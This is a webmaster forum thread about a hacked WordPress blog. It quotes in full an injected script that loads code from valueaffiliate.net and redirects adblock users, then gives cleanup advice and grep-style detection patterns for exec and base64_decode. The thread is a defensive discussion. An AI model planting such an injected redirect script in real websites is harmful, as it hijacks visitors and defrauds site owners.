PHP Injection?!?! http://valueaffiliate.net/abp

  • Telly
    Confirmed User
    • Jul 2007
    • 334

    #1


    I discovered a hack on my personal blog that I think might be of interest to all of us. When browsing hawaiipornblog.com with Firefox and adblock turned on I was redirected to http://valueaffiliate.net/abp

    It appears that this is some kind of cloaking injection on the index.php:
    <script type="text/javascript">var isloaded = false;</script><script type="text/javascript" src="http://valueaffiliate.net/overlay_gateway.php?pub=152855&gateid=MTk4NDkx"></script><script type="text/javascript">if (!isloaded) { window.location = 'http://valueaffiliate.net/abp'; }</script><noscript><meta http-equiv="refresh" content="0;url=http://valueaffiliate.net/java" /></noscript>

    Has anyone had a similar problem? I've commented it out but am unsure as to what it's doing other than redirecting adblock traffic. Your help would be appreciated!

    Telly

    MetroMoney.com - Limited-time $40PPS Promotion!
    DeviantHardcore.com
  • AzteK
    Confirmed User
    • Feb 2001
    • 3451

    #2
    ugh my antivirus just blocked this

    • SASCH
      Confirmed User
      • Jul 2011
      • 107

      #3
      You using WordPress?
      Account no longer in use.

      • Telly
        Confirmed User
        • Jul 2007
        • 334

        #4
        Originally posted by SASCH
        You using WordPress?
        Yup I'm on wordpress and am upgraded to the latest version, though I don't know how long that script has been on my site. What I do know is that sales took a dive for the past month so I can only guess it's been since then.

        • fris
          Too lazy to set a custom title
          • Aug 2002
          • 55679

          #5
          Originally posted by Telly
          Yup I'm on wordpress and am upgraded to the latest version, though I don't know how long that script has been on my site. What I do know is that sales took a dive for the past month so I can only guess it's been since then.
          download the zip from wordpress.org, reupload the files, which will replace all the core files. if the problem still is there, have a look at your theme code, mostly functions.php, footer.php and header.php

          or hit me up if you need help.
          Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.
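
Before overwriting core files as suggested in post #5, it helps to record which files differ from the wordpress.org copy. This is an added example, not from any poster in this thread; the function name and both directory arguments are assumptions, with the second one pointing at an unpacked wordpress.org zip of the same version:

```shell
#!/bin/sh
# Added example, not from the thread. Run it before overwriting anything, so
# the list of tampered files is kept for working out how the site was hit.

# compare_to_pristine SITE_DIR PRISTINE_DIR
# PRISTINE_DIR is an unpacked wordpress.org zip of the same version.
# Prints "modified<TAB>path" for files whose bytes differ from the pristine
# copy and "extra<TAB>path" for files the pristine copy does not ship
# (your own themes, plugins, uploads and wp-config.php land here too).
compare_to_pristine() {
    site=${1%/}
    ref=${2%/}
    find "$site" -type f | sort | while IFS= read -r f; do
        rel=${f#"$site"/}
        if [ ! -e "$ref/$rel" ]; then
            printf 'extra\t%s\n' "$rel"
        elif ! cmp -s "$f" "$ref/$rel"; then
            printf 'modified\t%s\n' "$rel"
        fi
    done
}

# Usage: sh compare.sh /var/www/blog /tmp/wordpress
if [ "$#" -eq 2 ]; then
    compare_to_pristine "$1" "$2"
fi
```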

          • Telly
            Confirmed User
            • Jul 2007
            • 334

            #6
            Originally posted by fris
            download the zip from wordpress.org, reupload the files, which will replace all the core files. if the problem still is there, have a look at your theme code, mostly functions.php, footer.php and header.php

            or hit me up if you need help.
            Thank you!

            • Mr Pheer
              So Fucking Banned
              • Dec 2002
              • 22083

              #7
              I'd like to kill the fuckin assholes that do this type of shit.

              • Telly
                Confirmed User
                • Jul 2007
                • 334

                #8
                Originally posted by Mr Pheer
                I'd like to kill the fuckin assholes that do this type of shit.
                heh "like"

                • scouser
                  marketer.
                  • Aug 2006
                  • 2280

                  #9
                  do a search for things like 'exec' or 'base64_decode'

                  ie
                  grep -r 'exec' ./
                  in ur root dir.

                  anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what it's doing.

                  • iSpyCams
                    Amateur Gynecologist
                    • May 2009
                    • 4436

                    #10
                    a while back I had an infection and the bastards made a cron job on my server that kept reinstalling it every day. So check your cron jobs too.
                    - As soon as I think up a good sig it's going here.

                    • Brujah
                      Beer Money Baron
                      • Jan 2001
                      • 22157

                      #11
                      You may also need to clear any cache folders, like supercache, etc..

                      • seeandsee
                        Check SIG!
                        • Mar 2006
                        • 50945

                        #12
                        problem is how you got hacked, is it host, is it ftp, is it script...
                        BUY MY SIG - 50$/Year

                        Contact here

                        • vdbucks
                          Monger Cash
                          • Jul 2010
                          • 2773

                          #13
                          Originally posted by deadmoon
                          do a search for things like 'exec' or 'base64_decode'

                          ie
                          grep -r 'exec' ./
                          in ur root dir.

                          anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what it's doing.
                          xargs is faster ^^

                          for example... cd to blog root directory then

                          find . -type f -print0 | xargs -0 grep 'exec'
                          Last edited by vdbucks; 10-05-2011, 05:52 AM.
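
The searches suggested in posts #9 and #13, combined with a check for the kind of third-party script tag shown in post #1, as an added example that is not from any poster in this thread. Function names and the own-hostname argument are assumptions; every hit is a lead to read by hand, since WordPress core legitimately calls several of these functions.

```shell
#!/bin/sh
# Added example, not from the thread. Hits are leads to review by hand.

# rank_suspicious_php DIR
# Prints "hits<TAB>longest-line<TAB>file" for every .php file with at least
# one line calling exec(), base64_decode(), file_get_contents() or curl_*().
# Most hits first; one very long line often means packed or obfuscated code.
rank_suspicious_php() {
    find "$1" -type f -name '*.php' -exec awk '
        length($0) > longest[FILENAME] { longest[FILENAME] = length($0) }
        /(base64_decode|exec|file_get_contents|curl_[a-z_]+) *\(/ { hits[FILENAME]++ }
        END { for (f in hits) print hits[f] "\t" longest[f] "\t" f }
    ' {} + | sort -rn
}

# list_remote_scripts DIR OWN_HOST
# Prints "file<TAB>host" for each <script src=...> in .php/.htm* files
# (cached pages included) that loads from a host other than OWN_HOST.
list_remote_scripts() {
    find "$1" -type f \( -name '*.php' -o -name '*.htm*' \) -exec awk -v own="$2" '
        BEGIN { own = tolower(own) }
        {
            line = tolower($0)
            while (match(line, /<script[^>]*src=.?(https?:)?\/\/[a-z0-9.-]+/)) {
                host = substr(line, RSTART, RLENGTH)
                sub(/.*\/\//, "", host)            # strip everything up to the host
                if (host != own) print FILENAME "\t" host
                line = substr(line, RSTART + RLENGTH)
            }
        }
    ' {} +
}

# Usage: sh triage.sh /path/to/webroot your-own-hostname
if [ "$#" -eq 2 ]; then
    rank_suspicious_php "$1"
    list_remote_scripts "$1" "$2"
fi
```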

                          • fris
                            Too lazy to set a custom title
                            • Aug 2002
                            • 55679

                            #14
                            shared hosting sucks for wordpress, because if someone else on the server has an insecure script then they can get access to any site on the shared server.

                            this is why i always have a dedicated and i'm the only one with access so that way if something happens i can only blame myself.